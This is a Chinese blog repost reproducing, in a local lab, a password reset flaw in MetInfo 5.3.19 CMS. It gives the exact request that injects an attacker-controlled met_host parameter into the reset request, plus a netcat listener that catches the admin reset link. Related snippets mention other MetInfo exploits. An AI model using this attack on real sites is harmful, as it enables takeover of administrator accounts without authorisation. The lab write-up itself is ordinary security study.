Metinfo 5.3.19管理员密码重置漏洞复现

最新推荐文章于 2021-09-11 16:02:50 发布
最新推荐文章于 2021-09-11 16:02:50 发布
阅读量772 收藏 1
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/xiaoyunxiaogang/p/10927652.html
版权

 Metinfo 5.3.19管理员密码重置漏洞

 

 操作系统:Windows 10专业版   kali linux

 

 网站环境:UPUPW 5.3

 

 使用工具:burpsuite 1.7 beta

 

漏洞分析

#密码重置过程中验证不严

#漏洞涉及到的几个文件分别是:

admin/admin/getpassword.php

include/common.inc.php

include/jmail.php

include/export.func.php

 

 

安装(请忽略我用QQ浏览器)

 

 

 

upupw默认数据账户密码:root--root

漏洞复现

登陆localhost/metinfo/admin点击忘记密码

 

用burp抓包

在kali虚拟机上监听80端口

nc -lvvp 80

kali机器上IP为192.168.43.15

 

在burp repeater中构造http请求发送

POST /metinfo/admin/admin/getpassword.php?met_host=192.168.43.15

 

这时候在我们kali监听的80端口监听到了密码重置的链接

 打开链接进入设置密码界面

 我这里好几次没有监听到不知到是怎末回事重启了kali就可以了(计算机玄学吧有时候得信)

漏洞建议:

升级CMS版本

二次开发中优化登陆代码避免逻辑错误

 

转载于:https://www.cnblogs.com/xiaoyunxiaogang/p/10927652.html

weixin_34101784
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
metinfo 5.3.19密码重置漏洞
公众号shadow sock7
10-17 3477
安装完成之后,即便之前已经将各目录设置为777了,到这一步时,也会将confg/config_db.php设置为只读。 查看改文件,发现确实是刚修改的。 步骤 先在一台metinfo服务器能访问的机器上设置监听80端口,如果metinfo能访问公网则可以设置公网服务器的IP,这里我就只设置为我metinfo所在虚拟机的宿主机的IP了。 C:\Users\caiqiqi>ncat -lvv...
MetInfo 5.3.19 变量覆盖漏洞
weixin_51681694的博客
05-04 266
MetInfo5.3.19 存在变量覆盖,导致可任意用户密码重置 见网上都没有详细的解释,我就来写一下顺便学习学习
Metinfo 5.3 后台getshell(远程文件包含漏洞)分析
__Curtain_
08-30 5974
最近准备入代码审计的坑,拿Metinfo来练练手,先找了下以前的版本整理下思路。 看了下大神的文章,代码审计的方法总体上分为两种:     1. 跟踪用户的输入数据,判断数据进入的每一个代码逻辑是否有可利用的点,此处的代码逻辑可以是一个函数,或者是条小小的条件判断语句。     2. 根据不同编程语言的特性,及其历史上经常产生漏洞的一些函数,功能,把这些点找出来,在分析函数调用时的参数,如果...
metinfo5.3mysql支持_MetInfo5.3.19安装过程过滤不严导致Getshell
weixin_35207054的博客
02-17 296
前言前几天在先知看到的漏洞,就很想写个分析过程了的,因为比赛培训和在审计一个CMS拖到了今天。环境Web: phpstudySystem: Windows 7 X64Browser: Firefox QuantumPython version : 2.7Tools: PhpStorm 2017.3.3、Seay源代码审计系统任意文件删除漏洞复现POC前提:需要由对应的删除权限flienamecsv...
SCANV团队紧急预警“MetInfo后门事件”
u013115619的专栏
12-21 4156
前天,安全联盟站长平台安全技术人员发现的由于“MetInfo(米拓)企业网站管理系统”官方下载安装文件包里被非法篡改,植入了恶意网站木马后门代码文件及“黑链”代码。当站长用户下载安装后,导致网站被“感染”该恶意后门及“黑链”代码,使网站沦为“肉鸡”。安全联盟站长平台立即启动了应急方案,已积极联系MetInfo官方(目前官方已经紧急更新了对应下载安装文件包。),并发布紧急预警,请近期下载安装过Met
metinfo 网站管理系统中的版权信息修改方法
09-28
有时候看下下面的官方的链接,不管什么目的,对自己的网站都是不好的,下面就说下修改方法。
MetInfo用户管理详解
08-04
本教程主要介绍了在MetInfo系统中的系统权限的管理与控制,管理员的添加与管理,会员功能的配置与管理。
MetInfo后台账号密码忘记了怎么办
11-27
教你快速找回MetInfo后台账号密码哦。
MetInfo企业网站管理系统 v5.2.8
04-04
MetInfo v5.2.8为了提升用户体验,增加了留言表单自定义字段、栏目前台自定义显示、产品联合查询标签等新功能,优化了文章模块、热门标签、管理员权限等多个方面的系统原有功能,修复了搜索产品、网站体检、图片模块...
MetInfo企业网站管理系统 v3.0版
03-26
MetInfo企业网站管理系统v3.0 开发进展与最新情况请访问官方网站:www.metinfo.cn。 全新安装:将压缩包内的所有文件上传到空间,运行网站地址便可以自动安装! 本安装程序更新日期为2010年3月10日,最新程序及免费...
密码重置漏洞
小羊的博客
09-11 2471
密码重置漏洞 概念 随着互联网的快速发展,在线支付业务的日渐成熟,大批的网上商城涌入互联网.为了方 便网上商城的快速上线,很多该类型的应用程序在未能严格审查源码的情况下就开始上线,导致很多逻辑错误类型的漏洞出现在应用程序中,而密码重置漏洞便是其中的一种。 漏洞位置在找回密码处,由于验证设计过于简单,而且对校验码的校验使用次数没有 进行限制,导致正确的验证码可以被枚举爆破,从而重置密码。此方法也是最常见的重置密 码的方式,因为大多数厂商最开始的设置都是采取的4-6 位纯数字验证码的验证方式,而.
metinfo多个漏洞(可getshell)
kendyhj9999的专栏
05-21 2855
http://www.wooyun.org/bugs/wooyun-2010-043795
metinfo全版本csrf漏洞(可导致重装)
u011066706的专栏
04-17 1946
漏洞文件/admin/app/batch/csvup.php 代码 <?php $depth='../'; require_once $depth.'../login/login_check.php'; setlocale(LC_ALL,array('zh_CN.gbk','zh_CN.gb2312','zh_CN.gb18030')); $codeold='gbk'; $codenew='u
MetInfo最新网站漏洞如何修复以及网站安全防护
网站安全专家
10-22 1962
metinfo漏洞于2018年10月20号被爆出存在sql注入漏洞,可以直接拿到网站管理员的权限,网站漏洞影响范围较广,包括目前最新的metinfo版本都会受到该漏洞的攻击,该metinfo漏洞产生的主要原因是可以绕过metinfo的安全过滤函数,导致可以直接插入恶意的sql注入语句执行到网站的后端里去,在数据库里执行管理员操作的一些功能,甚至可以直接sql注入到首页文件index.php去获取到...
MetInfo4.0 任意用户密码修改漏洞
干铮的博客
08-06 752
0x04 密码找回安全 验证码客户端回显测试 找回密码测试中要注意验证码是否会回显在响应中,有些⽹站程序会选择将验证码回显在响应中,来判 断⽤户输⼊的验证码是否和响应中的验证码⼀致,如果⼀致就会通过校验。 验证码暴⼒破解 找回密码功能模块中通常会将⽤户凭证(⼀般为验证码)发送到⽤户⾃⼰才可以看到的⼿机号或者邮箱 中,只要⽤户不泄露⾃⼰的验证码就不会被攻击者利⽤,但是有些应⽤程序在验证码发送功能模块中验 证码位数及复杂性较弱,也没有对验证码做次数限制...
01、版本管理-GIT
快把钟哥带走
06-12 158
一、版本控制 版本控制,通过文档控制记录各个模块的改动,并给每次改动添加序号,用于存储、追踪目录和文件的修改历史。 二、版本控制软件 GIT 分布式版本控制系统 SVN 集中式版本控制系统 三、git安装 1、git下载 - https://git-scm.com/downloads - https://pan.baidu.com/s/1kU5OCOB#list/path=%2...
【学习笔记】 MetInfo 6.0.0 任意文件读取漏洞
chualam的博客
11-02 839
readfile函数(xx) 控制xx里面的内容就可以实现任意读取
MetInfo5.3管理员密码重置漏洞
HeTuiPei的博客
07-23 737
需要工具Burp 虚拟机kali 浏览器 点击忘记密码 下一步 输入已知用户名或者邮箱点击下一步用Burp拦截 右键发送到Repeater 在第一行php后面拼接?met_host虚拟机kali的ip地址:端口号 拼接完成后 用虚拟机监听拼接的端口号 点击GO 虚拟机就会监听到信息 里面包含两个网页地址复制粘贴用浏览器打开 就完 ...
关于METINFO5.3漏洞引发的变量覆盖漏洞
weixin_30781775的博客
05-06 303
一.$$引起的变量覆盖漏洞, 1、Include 调用了flag.php文件(调用文件还可以有require_once()或者require());2、$_200,$_403 定义两个参数,以及参数值。3、判断访问页面的方法是否为post方法和有没有参数flag。4、再接着两个foreach函数遍历数组函数,然后再将获取到的数组键名作为变量,数组中的键值作为变量的值。5、还有一个i...
metinfo5.0.zip
最新发布
08-29
metinfo5.0.zip是一个软件压缩包,其中包含了MetInfo5.0版本的相关文件和代码。MetInfo是一款基于PHP+MySQL的网站建设系统,可以帮助用户快速搭建和管理自己的网站。 MetInfo5.0版本是MetInfo官方最新发布的版本,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值